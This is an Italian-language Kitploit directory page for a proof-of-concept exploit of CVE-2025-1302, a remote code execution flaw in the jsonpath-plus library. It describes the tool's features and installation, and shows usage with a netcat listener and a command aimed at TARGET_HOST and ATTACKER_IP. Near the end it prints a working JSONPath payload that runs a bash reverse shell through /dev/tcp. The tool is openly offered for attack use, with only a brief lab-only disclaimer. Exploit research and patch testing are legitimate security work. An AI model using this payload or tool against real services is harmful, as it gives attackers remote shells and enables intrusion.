Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — Exploit PoC e demo del server vulnerabile per CVE-2025-1302 in jsonpath-plus. | Kitploit
Strumenti/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-1302_jsonpath-plus_RCE

Exploit PoC e demo del server vulnerabile per CVE-2025-1302 in jsonpath-plus.

Vedi Repository
11 anno faNon ancora revisionato

CVE-2025-1302 JSONPath-Plus RCE PoC

Nome dello script PoC: poc.py

Uno script exploit proof-of-concept per CVE-2025-1302, che mira a una vulnerabilità RCE nella libreria jsonpath-plus. Quando viene eseguito contro un endpoint di servizio vulnerabile, lo script tenta di innescare l'esecuzione remota di codice tramite un payload JSONPath e di stabilire una reverse shell verso l'attaccante.


Caratteristiche

  • Metodi HTTP flessibili: supporta POST, GET o AUTO (POST con fallback a GET) tramite le opzioni --method o --no-fallback.
  • Payload personalizzati: carica uno o più template di payload RCE JSONPath da un file, con segnaposto {ip} e {port}.
  • Payload predefinito integrato: se non viene fornito alcun file di payload, usa un template completo di reverse shell bash.
  • Debug dettagliato: stampa i body completi di richieste/risposte per i tentativi POST e GET quando falliscono.
  • Indicatori di avanzamento: mostra i cicli di attesa e di payload con barre di avanzamento tqdm.
  • Registrazione: salva opzionalmente tutti i risultati in un file JSON con --output.

Installazione

  1. Clona questo repository:

    root@kitploit:~
    git clone https://github.com/yourorg/jsonpath-rce-poc.git
    cd jsonpath-rce-poc
    
  2. Installa le dipendenze (richiede Python 3.6+):

    root@kitploit:~
    pip install -r requirements.txt
    

Utilizzo

  1. Avvia un listener sulla tua macchina di attacco (sostituisci la porta se necessario):

    root@kitploit:~
    nc -lvnp 9999
    
  2. Esegui il PoC:

    root@kitploit:~
    python3 poc.py \
      --url http://TARGET_HOST:PORT/query \
      --ip ATTACKER_IP --port 9999 \
      [--payload-file payloads.txt] \
      [--delay 5] \
      [--method AUTO|POST|GET] \
      [--no-fallback] \
      [--output results.json]
    
  • --payload-file: File contenente un payload JSONPath per riga. Usa i segnaposto {ip} e {port}.
  • --delay: Secondi di attesa prima di inviare i payload (mostra un conto alla rovescia).
  • --method: Forza POST, GET o AUTO (default).
  • --no-fallback: Scorciatoia per saltare qualsiasi nuovo tentativo GET (equivalente a --method POST).
  • --output: Percorso in cui salvare il log JSON dei tentativi.

Esempio di file di payload

root@kitploit:~
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]

Contributi

  1. Fai il fork del repository e crea un branch per la funzionalità.
  2. Invia una pull request con le tue modifiche.

Esclusione di responsabilità

Usa questo script solo in ambienti di laboratorio controllati e su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'abuso può essere illegale e non etico.

Scarica lo strumento